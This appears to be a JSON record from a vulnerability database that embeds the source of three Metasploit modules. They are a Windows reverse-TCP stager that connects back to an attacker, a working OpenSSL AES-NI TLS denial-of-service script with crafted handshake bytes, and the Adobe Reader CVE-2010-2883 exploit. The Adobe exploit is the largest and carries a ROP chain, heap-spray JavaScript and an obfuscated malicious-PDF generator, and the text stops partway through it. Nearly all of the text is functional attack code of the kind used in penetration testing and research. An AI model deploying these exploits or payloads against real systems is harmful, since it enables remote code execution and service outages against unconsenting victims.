"708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "12ddc4e416666d511dba15f44a83b1c2", "key": "href"}, {"hash": "460fe1ef639081c309d9540a68da93f2", "key": "modified"}, {"hash": "460fe1ef639081c309d9540a68da93f2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5b96d94c06a00f14cd5a135cd91a8d24", "key": "reporter"}, {"hash": "024d0917491b8f20ee7eb86b14a98a37", "key": "sourceData"}, {"hash": "8150ecb07532ab401d1a84f7644a33f9", "key": "sourceHref"}, {"hash": "3f2dd0f7aea5c2c57a2fe5c0c501add9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-10-20T22:15:21", "bulletinFamily": "exploit", "description": "Uploads an executable and runs it (staged). Connect back to the attacker\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-28T07:59:20", "id": "MSF:PAYLOAD/WINDOWS/UPEXEC/REVERSE_TCP_RC4_DNS", "href": "", "type": "metasploit", "title": "Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb"}, {"lastseen": "2019-10-22T03:54:30", "bulletinFamily": "exploit", "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with a TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL. This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default OpenSSL 1.0.1c package.\n", "modified": "2017-07-24T13:26:21", "published": "2013-02-27T21:57:53", "id": "MSF:AUXILIARY/DOS/SSL/OPENSSL_AESNI", "href": "", "type": "metasploit", "title": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# auxilary/dos/ssl/openssl_aesni\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',\n 'Description'\t=> %q{\n The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.\n },\n 'Author'\t=>\n [\n 'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n [ 'CVE', '2012-2686'],\n [ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]\n ],\n 'DisclosureDate' => 'Feb 05 2013'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptInt.new('MAX_TRIES', [true, \"Maximum number of tries\", 300])\n ])\n end\n\n def run\n # Client Hello\n p1 = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p1 << \"\\x03\\x01\"\t\t\t\t# Version: TLS 1.0\n p1 << \"\\x00\\x7e\"\t\t\t\t# Length: 126\n p1 << \"\\x01\"\t\t\t\t# Handshake Type: Client Hello\n p1 << \"\\x00\\x00\\x7a\"\t\t\t# Length: 122\n p1 << \"\\x03\\x02\"\t\t\t\t# Version: TLS 1.1\n p1 << (\"A\" * 32)\t\t\t\t# Random\n p1 << \"\\x00\"\t\t\t\t# Session ID Length: 0\n p1 << \"\\x00\\x08\"\t\t\t\t# Cypher Suites Length: 6\n p1 << \"\\xc0\\x13\"\t\t\t\t# - ECDHE-RSA-AES128-SHA\n p1 << \"\\x00\\x39\"\t\t\t\t# - DHE-RSA-AES256-SHA\n p1 << \"\\x00\\x35\"\t\t\t\t# - AES256-SHA\n p1 << \"\\x00\\xff\"\t\t\t\t# - EMPTY_RENEGOTIATION_INFO_SCSV\n p1 << \"\\x01\"\t\t\t\t# Compression Methods Length: 1\n p1 << \"\\x00\"\t\t\t\t# - NULL-Compression\n p1 << \"\\x00\\x49\"\t\t\t\t# Extensions Length: 73\n p1 << \"\\x00\\x0b\"\t\t\t\t# - Extension: ec_point_formats\n p1 << \"\\x00\\x04\"\t\t\t\t# Length: 4\n p1 << \"\\x03\"\t\t\t\t# EC Points Format Length: 3\n p1 << \"\\x00\"\t\t\t\t# - uncompressed\n p1 << \"\\x01\"\t\t\t\t# - ansiX962_compressed_prime\n p1 << \"\\x02\"\t\t\t\t# - ansiX962_compressed_char2\n p1 << \"\\x00\\x0a\"\t\t\t\t# - Extension: elliptic_curves\n p1 << \"\\x00\\x34\"\t\t\t\t# Length: 52\n p1 << \"\\x00\\x32\"\t\t\t\t# Elliptic Curves Length: 50\n # 25 Elliptic curves:\n p1 << \"\\x00\\x0e\\x00\\x0d\\x00\\x19\\x00\\x0b\\x00\\x0c\\x00\\x18\\x00\\x09\\x00\\x0a\"\n p1 << \"\\x00\\x16\\x00\\x17\\x00\\x08\\x00\\x06\\x00\\x07\\x00\\x14\\x00\\x15\\x00\\x04\"\n p1 << \"\\x00\\x05\\x00\\x12\\x00\\x13\\x00\\x01\\x00\\x02\\x00\\x03\\x00\\x0f\\x00\\x10\"\n p1 << \"\\x00\\x11\"\n\n p1 << \"\\x00\\x23\"\t\t\t\t# - Extension: SessionTicket TLS\n p1 << \"\\x00\\x00\"\t\t\t\t# Length: 0\n p1 << \"\\x00\\x0f\"\t\t\t\t# - Extension: Heartbeat\n p1 << \"\\x00\\x01\"\t\t\t\t# Length: 1\n p1 << \"\\x01\"\t\t\t\t# Peer allowed to send requests\n\n\n # Change Cipher Spec Message\n p2_cssm = \"\\x14\"\t\t\t\t# Content Type: Change Cipher Spec\n p2_cssm << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_cssm << \"\\x00\\x01\"\t\t\t# Length: 1\n p2_cssm << \"\\x01\"\t\t\t\t# Change Cipher Spec Message\n\n\n # Encrypted Handshake Message\n p2_ehm = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_ehm << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_ehm << \"\\x00\\x40\"\t\t\t# Length: 64\n p2_ehm << (\"A\" * 64)\t\t\t# Encrypted Message\n\n\n # Client Key Exchange, Change Cipher Spec, Encrypted Handshake\n # AES256-SHA\n p2_aes_sha = \"\\x16\"\t\t\t# Content Type: Handshake\n p2_aes_sha << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_aes_sha << \"\\x01\\x06\"\t\t\t# Length: 262\n p2_aes_sha << \"\\x10\"\t\t\t# Handshake Type: Client Key Exchange\n p2_aes_sha << \"\\x00\\x01\\x02\"\t\t# Length: 258\n p2_aes_sha << \"\\x01\\x00\"\t\t\t# Encrypted PreMaster Length: 256\n p2_aes_sha << (\"\\x00\" * 256)\t\t# Encrypted PresMaster (irrelevant)\n p2_aes_sha << p2_cssm \t\t\t# Change Cipher Spec Message\n p2_aes_sha << p2_ehm\t\t\t# Encrypted Handshake Message\n\n\n # DHE-RSA-AES256-SHA\n p2_dhe = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_dhe << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_dhe << \"\\x00\\x46\"\t\t\t# Length: 70\n p2_dhe << \"\\x10\"\t\t\t\t# Handshake Type: Client Key Exchange\n p2_dhe << \"\\x00\\x00\\x42\"\t\t\t# Length: 66\n p2_dhe << \"\\x00\\x40\"\t\t\t# DH Pubkey Length: 64\n p2_dhe << (\"A\" * 64)\t\t\t# DH Pubkey\n p2_dhe << p2_cssm\t\t\t\t# Change Cipher Spec Message\n p2_dhe << p2_ehm\t\t\t\t# Encrypted Handshake Message\n\n\n # ECDHE-RSA-AES128-SHA\n p2_ecdhe = \"\\x16\"\t\t\t\t# Content Type: Handshake\n p2_ecdhe << \"\\x03\\x02\"\t\t\t# Version: TLS 1.1\n p2_ecdhe << \"\\x00\\x46\"\t\t\t# Length: 70\n p2_ecdhe << \"\\x10\"\t\t\t\t# Handshake Type: Client Key Exchange\n p2_ecdhe << \"\\x00\\x00\\x42\"\t\t\t# Length: 66\n p2_ecdhe << \"\\x41\"\t\t\t\t# EC DH Pubkey Length: 65\n # EC DH Pubkey:\n p2_ecdhe << \"\\x04\\x2f\\x22\\xf4\\x06\\x3f\\xa1\\xf7\\x3d\\xb6\\x55\\xbc\\x68\\x65\\x57\\xd8\"\n p2_ecdhe << \"\\x03\\xe5\\xaa\\x36\\xeb\\x0f\\x52\\x5a\\xaf\\xd0\\x9f\\xf8\\xc7\\xfe\\x09\\x69\"\n p2_ecdhe << \"\\x5b\\x38\\x95\\x58\\xb6\\x0d\\x27\\x53\\xe9\\x63\\xcb\\x96\\xb3\\x54\\x47\\xa6\"\n p2_ecdhe << \"\\xb2\\xe6\\x8b\\x2a\\xd9\\x03\\xb4\\x85\\x46\\xd9\\x1c\\x5f\\xd1\\xf7\\x7b\\x73\"\n p2_ecdhe << \"\\x40\"\n p2_ecdhe << p2_cssm\t\t\t\t# Change Cipher Spec Message\n p2_ecdhe << p2_ehm\t\t\t\t# Encrypted Handshake Message\n\n\n maxtries = datastore['MAX_TRIES']\n\n success = false\n\n for i in 0..maxtries\n print_status(\"Try \\##{i}\")\n\n connect\n\n sock.put(p1)\n resp = sock.get_once\n\n cs = get_cipher_suite(resp)\n\n if cs == 0xc013 # ECDHE-RSA-AES128-SHA\n p2 = p2_ecdhe\n elsif cs == 0x0039 # DHE-RSA-AES256-SHA\n p2 = p2_dhe\n elsif cs == 0x0035 # AES256-SHA\n p2 = p2_aes_sha\n else\n print_error(\"No common ciphers!\")\n return\n end\n\n sock.put(p2)\n\n alert = nil\n\n begin\n alert = sock.get_once(-1, 2)\n rescue EOFError\n print_good(\"DoS successful. process on #{rhost} did not respond.\")\n success = true\n break\n end\n\n disconnect\n\n end\n\n if success == false\n print_error(\"DoS unsuccessful.\")\n end\n end\n\n def get_cipher_suite(resp)\n offset = 0\n\n while offset < resp.length\n type = (resp[offset, 1]).unpack(\"C\")[0]\n\n if not type == 22 # Handshake\n return nil\n end\n\n len = (resp[offset+3, 2]).unpack(\"n\")[0]\n hstype = (resp[offset+5, 1]).unpack(\"C\")[0]\n\n if hstype == 2 # Server Hello\n return (resp[offset+44, 2]).unpack(\"n\")[0]\n end\n\n offset += len\n end\n\n end\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/ssl/openssl_aesni.rb"}, {"lastseen": "2019-12-06T16:46:19", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.\n", "modified": "2017-07-24T13:26:21", "published": "2010-09-09T23:23:40", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_COOLTYPE_SING", "href": "", "type": "metasploit", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # 0day found in the wild\n 'sn0wfl0w', # initial analysis, also @vicheck on twitter\n 'jduck' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2010-2883' ],\n [ 'OSVDB', '67849'],\n [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\n [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'HTTP::compression' => 'gzip',\n 'HTTP::chunked' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\n # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\n # Tested OK via Adobe Reader 9.3 on XP and 7 -todb\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Sep 07 2010',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\n path = File.join( Msf::Config.data_directory, \"exploits\", \"cve-2010-2883.ttf\" )\n fd = File.open( path, \"rb\" )\n @ttf_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n\n def on_request_uri(cli, request)\n print_user_agent(cli, request)\n\n print_status(\"Sending crafted PDF\")\n\n ttf_data = make_ttf()\n\n js_data = make_js(regenerate_payload(cli).encoded)\n\n # Create the pdf\n pdf = make_pdf(ttf_data, js_data)\n\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\n\n def print_user_agent(cli, req)\n return unless cli && cli.peerhost\n return unless req && req.headers\n return unless ua = req.headers[\"User-Agent\"]\n print_status \"Request from browser: #{ua}\"\n end\n\n def make_ttf\n\n # load the static ttf file\n ttf_data = @ttf_data.dup\n\n # Build the SING table\n sing = ''\n sing << [\n 0, 1, # tableVersionMajor, tableVersionMinor (0.1)\n 0xe01, # glyphletVersion\n 0x100, # embeddingInfo\n 0, # mainGID\n 0, # unitsPerEm\n 0, # vertAdvance\n 0x3a00 # vertOrigin\n ].pack('vvvvvvvv')\n # uniqueName\n # \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\n #sing << \"A\" * (0x254 - sing.length)\n sing << rand_text(0x254 - sing.length)\n\n # 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\n sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\n\n # This becomes our new EIP (puts esp to stack buffer)\n ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\n sing[0x208, 4] = [ret].pack('V')\n\n # This becomes the new eip after the first return\n ret = 0x4a82a714\n sing[0x18, 4] = [ret].pack('V')\n\n # This becomes the new esp after the first return\n esp = 0x0c0c0c0c\n sing[0x1c, 4] = [esp].pack('V')\n\n # Without the following, sub_801ba57 returns 0.\n sing[0x24c, 4] = [0x6c].pack('V')\n\n ttf_data[0xec, 4] = \"SING\"\n ttf_data[0x11c, sing.length] = sing\n\n ttf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using icucnv36.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0x41414141, # unused\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0000, # becomes ecx\n\n 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\n\n 0x4a801f90, # pop eax / ret\n 0x4a84903c, # becomes eax (import for CreateFileA)\n\n # -- call CreateFileA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\n 0x10000000, # second arg - dwDesiredAccess\n 0x00000000, # third arg - dwShareMode\n 0x00000000, # fourth arg - lpSecurityAttributes\n 0x00000002, # fifth arg - dwCreationDisposition\n 0x00000102, # sixth arg - dwFlagsAndAttributes\n 0x00000000, # seventh arg - hTemplateFile\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n #\n # This points at a neat-o block of code that ... TBD\n #\n # and [esp+ebx*2],edi\n # jne check_slash\n # ret_one:\n # mov al,1\n # ret\n # check_slash:\n # cmp al,0x2f\n # je ret_one\n # cmp al,0x41\n # jl check_lower\n # cmp al,0x5a\n # jle check_ptr\n # check_lower:\n # cmp al,0x61\n # jl ret_zero\n # cmp al,0x7a\n # jg ret_zero\n # cmp [ecx+1],0x3a\n # je ret_one\n # ret_zero:\n # xor al,al\n # ret\n #\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849038, # becomes eax (import for CreateFileMappingA)\n\n # -- call CreateFileMappingA\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # arguments to CreateFileMappingA, hFile\n 0x00000000, # lpAttributes\n 0x00000040, # flProtect\n 0x00000000, # dwMaximumSizeHigh\n 0x00010000, # dwMaximumSizeLow\n 0x00000000, # lpName\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000008, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849030, # becomes eax (import for MapViewOfFile\n\n # -- call MapViewOfFile\n 0x4a80b692, # jmp [eax]\n\n 0x4a801064, # ret\n\n 0xffffffff, # args to MapViewOfFile - hFileMappingObject\n 0x00000022, # dwDesiredAccess\n 0x00000000, # dwFileOffsetHigh\n 0x00000000, # dwFileOffsetLow\n 0x00010000, # dwNumberOfBytesToMap\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a8a0004, # becomes ecx - writable pointer\n\n 0x4a802196, # mov [ecx],eax / ret - save map base addr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000030, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a8a0004, # becomes eax - saved file mapping ptr\n\n 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x00000020, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\n\n 0x4a801f90, # pop eax / ret\n 0x00000034, # becomes eax\n\n 0x4a80d585, # add eax,edx / ret\n\n 0x4a8063a5, # pop ecx / ret\n 0x4a801064, # becomes ecx - ptr to ret\n\n 0x4a842db2, # xchg eax,edi / ret\n\n 0x4a802ab1, # pop ebx / ret\n 0x0000000a, # becomes ebx - offset to modify\n\n 0x4a80a8a6, # execute fun block\n\n 0x4a801f90, # pop eax / ret\n 0x4a849170, # becomes eax (import for memcpy)\n\n # -- call memcpy\n 0x4a80b692, # jmp [eax]\n\n 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\n 0xffffffff, # becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n 